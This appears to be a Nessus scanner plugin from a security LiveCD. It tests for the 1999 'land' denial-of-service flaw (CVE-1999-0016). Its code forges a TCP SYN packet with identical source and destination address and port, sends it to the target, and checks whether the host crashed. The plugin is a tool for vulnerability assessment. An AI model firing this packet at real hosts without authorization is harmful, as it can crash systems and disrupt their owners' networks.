home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / land.nasl

< prev

next >

Wrap

Text File  |  2005-01-14  |  3KB  |  111 lines

---

1. #
2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
3. #
4. # See the Nessus Scripts License for details
5. #
6.  
7. if(description)
8. {
9.  script_id(10133);
10.  script_bugtraq_id(2666);
11.  script_version ("$Revision: 1.17 $");
12.  script_cve_id("CVE-1999-0016");
13.  name["english"] = "Land";
14.  name["francais"] = "Land";
15.  script_name(english:name["english"], francais:name["francais"]);
16.  
17.  desc["english"] = "It was possible to make the remote server crash
18. using the 'land' attack. 
19.  
20. An attacker may use this flaw to shut down this server, thus 
21. preventing your network from working properly.
22.  
23. Solution : contact your operating
24. system vendor for a patch.
25.  
26. Risk factor : High";
27.  
28.  
29.  desc["francais"] = "Il s'est avΘrΘ
30. possible de faire planter la 
31. machine distante en utilisant
32. l'attaque 'land'. 
33.  
34. Un pirate peut utiliser cette
35. attaque pour empecher votre
36. rΘseau de fonctionner normallement.
37.  
38. Solution : contactez le vendeur
39. de votre OS pour un patch.
40.  
41. Facteur de risque : ElevΘ";
42.  
43.  script_description(english:desc["english"], francais:desc["francais"]);
44.  
45.  summary["english"] = "Crashes the remote host using the 'land' attack";
46.  summary["francais"] = "Plante le serveur distant en utilisant l'attaque 'land'";
47.  script_summary(english:summary["english"], francais:summary["francais"]);
48.  
49.  script_category(ACT_KILL_HOST);
50.  
51.  
52.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
53.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
54.  family["english"] = "Denial of Service";
55.  family["francais"] = "DΘni de service";
56.  script_family(english:family["english"], francais:family["francais"]);
57.  
58.  
59.  exit(0);
60. }
61.  
62. #
63. # The script code starts here
64. #
65.  
66. addr = get_host_ip();
67. ip = forge_ip_packet(   ip_v : 4,
68.             ip_hl : 5,
69.             ip_tos : 0,
70.             ip_len : 20,
71.                 ip_id : 0xF1C,
72.             ip_p : IPPROTO_TCP,
73.             ip_ttl : 255,
74.                 ip_off : 0,
75.             ip_src : addr);
76. port = get_host_open_port();
77. if(!port)exit(0);
78.  
79. # According to
80. #  From: "Seeker of Truth" <seeker_sojourn@hotmail.com>
81. #  To: bugtraq@securityfocus.com
82. #  Subject: Fore/Marconi ATM Switch 'land' vulnerability
83. #  Date: Fri, 14 Jun 2002 23:35:41 +0000
84. #  Message-ID: <F16103xv3Ho8Xu1njpu00003202@hotmail.com>
85. # Fore/Marconi ATM Switch FT6.1.1 and FT7.0.1 are vulnerable to a land
86. # attack against port 23.
87.  
88. tcpip = forge_tcp_packet(    ip          : ip,
89.                  th_sport : port,    
90.                  th_dport : port,   
91.                  th_flags : TH_SYN,
92.                      th_seq   : 0xF1C,
93.                  th_ack   : 0,
94.                  th_x2    : 0,
95.                   th_off   : 5,     
96.                  th_win   : 2048, 
97.                  th_urp   : 0);
98.  
99. #
100. # Ready to go...
101. #
102.              
103. start_denial();
104. send_packet(tcpip, pcap_active:FALSE);
105. sleep(5);
106. alive = end_denial();
107. if(!alive){
108.         set_kb_item(name:"Host/dead", value:TRUE);
109.         security_hole(0);
110.         }
111.